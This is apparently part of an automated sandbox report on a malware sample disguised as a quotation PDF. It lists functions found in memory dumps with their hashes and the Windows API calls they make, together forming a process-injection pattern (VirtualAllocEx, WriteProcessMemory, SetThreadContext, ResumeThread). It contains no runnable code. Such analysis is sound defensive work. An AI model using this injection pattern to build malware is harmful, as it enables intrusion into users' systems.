Uniqueness Score: -1.00%

Function 05C00C20 Relevance: 1.8, Strings: 1, Instructions: 534
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(_0q, xrefs: 05C00EB0

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: (_0q
API String ID: 0-3680912921
Opcode ID: e085d2a49d0783f2df8b7574334163caf2c7c019143c6b315452fca8d3431b48
Instruction ID: dc7678bd2eee307eab61c30d491ab79aebb17cff4f7527b65fb3b769bb33a7dc
Opcode Fuzzy Hash: e085d2a49d0783f2df8b7574334163caf2c7c019143c6b315452fca8d3431b48
Instruction Fuzzy Hash: 8A226B35A102059FDB14DFA9C894A6DBBF6FF88300F158469E906EB3A5CB71ED44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C80D87 Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C80FC6

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5d9ad49b3847cc484421a570850a8b6e167c512f77cdbf585769a12d8799464a
Instruction ID: 8d41a7bedbc2fa28f756d43b0e0c0dc0c165c4077ac629f3c694438ee70c2bcc
Opcode Fuzzy Hash: 5d9ad49b3847cc484421a570850a8b6e167c512f77cdbf585769a12d8799464a
Instruction Fuzzy Hash: 0A919B71D002599FDB20DF68C944BEEBBF2BF48314F148969D848B7280D7749A89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05C80D90 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C80FC6

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e4026f323645303e461a67362b8e847136b527d5ec1ae45e02e2bbc48c646320
Instruction ID: 8e50466f232a38cf212c4430fd8ae5c0df4d196d70464125cccc5f534e7ea859
Opcode Fuzzy Hash: e4026f323645303e461a67362b8e847136b527d5ec1ae45e02e2bbc48c646320
Instruction Fuzzy Hash: B7918B71D042599FDB20DF68C944BEEBBF2BF48314F148969D848B7280DB749A89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05C80BE0 Relevance: 1.6, APIs: 1, Instructions: 89injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05C80C78

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7f685de311c8f42f5f61a8ce155d49b861b7dc1dd2075874721d70427fdee4a6
Instruction ID: b99760d0cb3276fac9cc2b3df07ad479a6da68642a45147fed3091eade72effa
Opcode Fuzzy Hash: 7f685de311c8f42f5f61a8ce155d49b861b7dc1dd2075874721d70427fdee4a6
Instruction Fuzzy Hash: 73315C769002098FCB10DFA9C9857EEFBF5FF88324F14882AE514A7341C7799944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05C80BE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05C80C78

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f1329b2b108dd4087a7bc37a1cc832b96e67e110b95a5228e5c36ef6c57c651c
Instruction ID: 9641fd9054378c55d93ba060a049a63af7aaa420f0ee7d8547d126c07d845171
Opcode Fuzzy Hash: f1329b2b108dd4087a7bc37a1cc832b96e67e110b95a5228e5c36ef6c57c651c
Instruction Fuzzy Hash: F32139B59003199FCF10DFAAC9847EEBBF5FF48324F108829E918A7250C7789944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05C811CB Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C81250

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4c1ef1420a202e98897308a0e96ac6eae1d0a759c7afe94c516856e5271fb0ed
Instruction ID: b70d24689dfd039561da7b6968fcaf5d7b1800da19e360ccf879b1f0cc41d3b8
Opcode Fuzzy Hash: 4c1ef1420a202e98897308a0e96ac6eae1d0a759c7afe94c516856e5271fb0ed
Instruction Fuzzy Hash: 67213CB1D002499FCB10DFAAC9847EEFBF5FF48320F548829E518A7240C7789945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05C80A4B Relevance: 1.6, APIs: 1, Instructions: 64threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 05C80ACE

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 76fceb66d4a433278f18b906dbbc7e085a181c2c3c67c3605eb7b0ef4a9795e2
Instruction ID: d5a3f359d23aaab2313081ff512233dd888ed95c34331d80c6de777a0fe3e887
Opcode Fuzzy Hash: 76fceb66d4a433278f18b906dbbc7e085a181c2c3c67c3605eb7b0ef4a9795e2
Instruction Fuzzy Hash: 30213871D002098FDB50DFAAC5857EEBBF4EF88364F54842AD419A7241C778A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05C811D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C81250

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 58c7eda0b5057c091672f7f86a29e217bf7b48d2c751e7f94fcdafa71a0c1ae9
Instruction ID: 3dbb991b601c849b433561794e13a6c0bd197a4e985cf65dd1fef03f3a60b0a6
Opcode Fuzzy Hash: 58c7eda0b5057c091672f7f86a29e217bf7b48d2c751e7f94fcdafa71a0c1ae9
Instruction Fuzzy Hash: 7B2139B1C002499FCB10DFAAC9847EEFBF5FF48320F548829E518A7240C7789944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C80A50 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 05C80ACE

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 124f6ecdc44a5d1e5732ac5325995718d55a2d28aa7a6ac733d6c9fa1bdcda36
Instruction ID: 8281089810351dbddc0f219ee93de6be2f5f9bcce6e1e4dd8ebfe516b3a8720f
Opcode Fuzzy Hash: 124f6ecdc44a5d1e5732ac5325995718d55a2d28aa7a6ac733d6c9fa1bdcda36
Instruction Fuzzy Hash: 1F214971D002098FDB10DFAAC5847EEBBF4EF88324F14842AD419A7241C778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C80B23 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C80B96

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 18d6c93ea309507f8001c477a2a1aa50ce1893fb158a39606f85d3c456b1718c
Instruction ID: 168f43deda8271512f4f302ea09d993cd191ea6643effaccde54716d0bfa6eb4
Opcode Fuzzy Hash: 18d6c93ea309507f8001c477a2a1aa50ce1893fb158a39606f85d3c456b1718c
Instruction Fuzzy Hash: B21137769002099FCF10DFAAC945BEEBFF5EF88324F248829E515A7250C775A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C80B28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C80B96

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 78fde221f83fe212a75a09ad9d7b904e10fa3629886d4e87450646ed0ada4fbf
Instruction ID: f07736795c17ffa78b603364a5f471294ce058f21c4df6c7f7d86edf96558386
Opcode Fuzzy Hash: 78fde221f83fe212a75a09ad9d7b904e10fa3629886d4e87450646ed0ada4fbf
Instruction Fuzzy Hash: 8B1137759002099FCB10DFAAC944BEEBFF5AF88324F248819E515A7250C775A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C80998 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05C80A02

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4139c62a144dfc80d1b73503e4aa942f4a1d0e39aa99da66f00f24c557cf1666
Instruction ID: cc23a32767c74125d6f6707ec541719f13f1a06e7ae73457ae377ca18c9ede22
Opcode Fuzzy Hash: 4139c62a144dfc80d1b73503e4aa942f4a1d0e39aa99da66f00f24c557cf1666
Instruction Fuzzy Hash: D8113DB5D002488FCB10DFA9C6457EEFBF5AF48324F248819C515B7241C7795944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C809A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05C80A02

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6874340abe9e2057b63bf99ffc6c69e65aa4a7926092b8e2e8816301632974ad
Instruction ID: 374dcb6cc1c0ead16db32773040cc0e99dc248d637ca218486a611846c0f18a3
Opcode Fuzzy Hash: 6874340abe9e2057b63bf99ffc6c69e65aa4a7926092b8e2e8816301632974ad
Instruction Fuzzy Hash: E8111CB5D002498FDB20DFAAC5487EEFBF9AF88324F248819D515A7340C779A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05C0D718 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

(4q, xrefs: 05C0DA08

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: (4q
API String ID: 0-3825661732
Opcode ID: 6b4b3c4cb5cd03c80874407a542e448b8e9328495c5614cd6758eea65a971b25
Instruction ID: 5f39a5afe2017092c41084eb342ec40b7ff6fe600028a1cc07d926ce00181cf0
Opcode Fuzzy Hash: 6b4b3c4cb5cd03c80874407a542e448b8e9328495c5614cd6758eea65a971b25
Instruction Fuzzy Hash: 75B1CB35A047058FCB25DFA9C844A6EBBF2BF88300F14896AE546D7B94DB30E905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05C063F0 Relevance: 1.5, Strings: 1, Instructions: 289COMMON

Download Yara Rule

Strings

,4q, xrefs: 05C0677B

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: ,4q
API String ID: 0-2140648754
Opcode ID: 8d13f4bad7297000dcb36c5a18540060a6908e04de4e8ec4a8e8d015bc71560d
Instruction ID: 37948d0b70fc195fe260884b3b0df3e30fe0ab9ddd3e43b0bb134553ff9b08db
Opcode Fuzzy Hash: 8d13f4bad7297000dcb36c5a18540060a6908e04de4e8ec4a8e8d015bc71560d
Instruction Fuzzy Hash: 0CC15D74B001299FDB19CF59C945BDDBBF6BF88700F1484A9E509AB395CA309E81CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C0B0E8 Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

(4q, xrefs: 05C0B1BF

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: (4q
API String ID: 0-3825661732
Opcode ID: 2e2ac4a3dfbcefe760d326c0ac1bf83558c2661a1be6aba3c60190beed8fd484
Instruction ID: 66609f6a18b82c1a7e2ea01ae4405ba20a5478cd3d8115997ac4268f6fb06e65
Opcode Fuzzy Hash: 2e2ac4a3dfbcefe760d326c0ac1bf83558c2661a1be6aba3c60190beed8fd484
Instruction Fuzzy Hash: A9910434A007068FCB12DF68C4949AEBBF6FF85300B54486AC541DB3A5EB30EE06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05C05518 Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

4'0q, xrefs: 05C05742

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q
API String ID: 0-2605422550
Opcode ID: b8c1705789c00839bdb52b2eca5f066c76e8ee5f7d199785a229fa02f17088d3
Instruction ID: eb602ac49137e34962683506caada1b9d60a26a5fb8ac6eb063ffb254f987a39
Opcode Fuzzy Hash: b8c1705789c00839bdb52b2eca5f066c76e8ee5f7d199785a229fa02f17088d3
Instruction Fuzzy Hash: E7A1F934A10218DFCB08EFA4D89899DBBB2FF89300F559559E406AB3A5DF34AC42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05C08C00 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

4'0q, xrefs: 05C08D12

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q
API String ID: 0-2605422550
Opcode ID: 4f8a418be57a1f54b5c4bfe7671d035e1e424c467db0e0a1c026e941fc49a3d8
Instruction ID: 53292894135c4d50dd0ffb9bdc4803ff0eb11da5edfb5022c9c209d9f6a64e83
Opcode Fuzzy Hash: 4f8a418be57a1f54b5c4bfe7671d035e1e424c467db0e0a1c026e941fc49a3d8
Instruction Fuzzy Hash: EC713C30B002149FDB19EB68C954BAEBBB7BF88710F109469E506AB3D4CF759D42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C07F61 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

XR5q, xrefs: 05C080F3

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: XR5q
API String ID: 0-3321266579
Opcode ID: bc70533b537f491044c6eda673f0746669997aea614e44b3be0b55efc7a7d1e4
Instruction ID: 53e64eaa6d01eefc5d19869026763749d27f0484b155df498f40259b59a9163a
Opcode Fuzzy Hash: bc70533b537f491044c6eda673f0746669997aea614e44b3be0b55efc7a7d1e4
Instruction Fuzzy Hash: AF6155757042208FCB18CB28C998E6A3BF2FF8A315B1595A9E506CB3B5DB31DD42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05C0909F Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

4'0q, xrefs: 05C090E2

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q
API String ID: 0-2605422550
Opcode ID: d179e2916369cfe63016c9ffe09d44d9b483416efae6ddccd94f71e815b5ae65
Instruction ID: bb04e0e9818009b9a924b30377201d6c64c5ba164f9fdb6ad8fe2b5202bbbe7f
Opcode Fuzzy Hash: d179e2916369cfe63016c9ffe09d44d9b483416efae6ddccd94f71e815b5ae65
Instruction Fuzzy Hash: 99416F34B106148FCB18FB64C498A6EB7F7AFC9700F505919E502AB3E5CF74AC469B91

Uniqueness

Uniqueness Score: -1.00%

Function 05C08AA1 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

4'0q, xrefs: 05C08B57

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q
API String ID: 0-2605422550
Opcode ID: 32be4cc54ec65ed5ceed00255e5a5229790ee97e1533aff55ac492fe4f6f300c
Instruction ID: 18e3105f220db62d9699b788e77ffea13378887f391e067f5649e552dc96a53e
Opcode Fuzzy Hash: 32be4cc54ec65ed5ceed00255e5a5229790ee97e1533aff55ac492fe4f6f300c
Instruction Fuzzy Hash: 53315E753006109FD709EB68C999F2A77AAAFC9714F108568E2068F3E5CE71ED02C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 05C08AB0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'0q, xrefs: 05C08B57

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q
API String ID: 0-2605422550
Opcode ID: f3df4a71a9d36cf0618f8f516d6533a7a2bc722af2ebd8bc42611ed7e500441e
Instruction ID: 3c3fd08663b62aaebe9bffa48e407d95dfb72aca3e116e0ab881b55670d3cff3
Opcode Fuzzy Hash: f3df4a71a9d36cf0618f8f516d6533a7a2bc722af2ebd8bc42611ed7e500441e
Instruction Fuzzy Hash: BC3130753006119FD709DB69C999F2B77AAEFC9714F108568E2068B3A1CE71ED02C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 05C05929 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

4'0q, xrefs: 05C058A1

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q
API String ID: 0-2605422550
Opcode ID: 2709047edc89c01d050ae670278b895dba6846b5f0b998ea7d1d8cbc25de6d6e
Instruction ID: 53c29f96c9ea4fb67b60cd4f38c08543d98a943a8416ff9b220ee7dfec1a3a9d
Opcode Fuzzy Hash: 2709047edc89c01d050ae670278b895dba6846b5f0b998ea7d1d8cbc25de6d6e
Instruction Fuzzy Hash: DF41C574A00214CFDB18DF64D998AAEBBB2FF89704F114558E502AB3A5CB75ED42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05C04598 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

4'0q, xrefs: 05C045E1

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q
API String ID: 0-2605422550
Opcode ID: 0c98338e69bd25e9183cf238f8c84d52b67e34d481c61f9008735d1a8b4c6700
Instruction ID: 896a2bcadd29c1dc2748114bdc002524587b36fae0811ece111bde8b1396516a
Opcode Fuzzy Hash: 0c98338e69bd25e9183cf238f8c84d52b67e34d481c61f9008735d1a8b4c6700
Instruction Fuzzy Hash: 4E3193357042149FCF198FA9D994959BFB7FF88310B0540A9E6069B3A5DB31DC16CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C092E8 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30f645a23bb76d8e9f3a686eec2e7e1e46f06dc2b2955808e9613a0d5be5af12
Instruction ID: 3a08fa3583bcf19835d7343a05be986f1052220257acc299bfb18218fcb58cc6
Opcode Fuzzy Hash: 30f645a23bb76d8e9f3a686eec2e7e1e46f06dc2b2955808e9613a0d5be5af12
Instruction Fuzzy Hash: 8C12CB34A102198FCB14EF68C994BADB7B2BF89300F5195A8E549AB395DF30AD85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05C092DE Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c98578e9c5d08cbc386491e6ab5347963d8d52687c4e8f7396fd06dbe7c67078
Instruction ID: bfb88274bfd49bf165c97e99431b94834ce176bd93b83c9d0bd4e1456cdab046
Opcode Fuzzy Hash: c98578e9c5d08cbc386491e6ab5347963d8d52687c4e8f7396fd06dbe7c67078
Instruction Fuzzy Hash: EBA10D74B002158FDB14DF64C898BA9B7B2BF89300F5095A8E54AAB396DF34AD85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05C0A338 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 531cd57a52fbc71540f0d212ac72f7670910dc56a3ae84ea23df5a2c9f4903c7
Instruction ID: 11ca2179beb38a25d3d5b298f184908151d658ddecf273ba43eef59f09bda650
Opcode Fuzzy Hash: 531cd57a52fbc71540f0d212ac72f7670910dc56a3ae84ea23df5a2c9f4903c7
Instruction Fuzzy Hash: BF915B347106149FCB05DF68C898AAE7BF2FF89710F1494A9E4069B3A5CB34ED42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C09C56 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c0dbca9a3d0587ae33837f708ecba1b2d66fceb874abe02524d4a8af9a5c891
Instruction ID: fef3743990f118c3c7ab5ba4c578481ad2015aeff84b3f5b150ff48895cb8501
Opcode Fuzzy Hash: 3c0dbca9a3d0587ae33837f708ecba1b2d66fceb874abe02524d4a8af9a5c891
Instruction Fuzzy Hash: DAA1ED34A11208DFCB08EFA4E4989AD7BB2FF89311F509565F9026B3A4DB35AD42DF50

Uniqueness

Uniqueness Score: -1.00%

Function 05C07D58 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de49daefce8a3ecd9a637b3657104644c5b0795e03ca9f179f3a652672587f7f
Instruction ID: 332ca90131d9f7474f391667df1e1a255e3fb23bdd0faf612268baef1aa73895
Opcode Fuzzy Hash: de49daefce8a3ecd9a637b3657104644c5b0795e03ca9f179f3a652672587f7f
Instruction Fuzzy Hash: 67519032A10118DFCF15CF54D804EA9BBB6FF89310F0580A5E509AB262C735EE56CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05C02108 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766afe47a2d2ceaf666946a8d0b8269145f160e041ae6b417878a37434b9ca51
Instruction ID: 088417124b486d0f4ddca314a5cfc59e2752793f5f8ce8dd60ab4e362aa724e8
Opcode Fuzzy Hash: 766afe47a2d2ceaf666946a8d0b8269145f160e041ae6b417878a37434b9ca51
Instruction Fuzzy Hash: 1E814B39A00218DFCB25DFA8C588D9DBBF9FF48710B1594A9E8069B361DB30ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C0A32A Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4337e8bd381ab0ff29c4aa89663af0e27b3505c7dc29b0dd350aacf7c698cc7e
Instruction ID: fe5138af694d56c1d413cc3c468e0ca1605fda242e3fb28581f6f525c8bba857
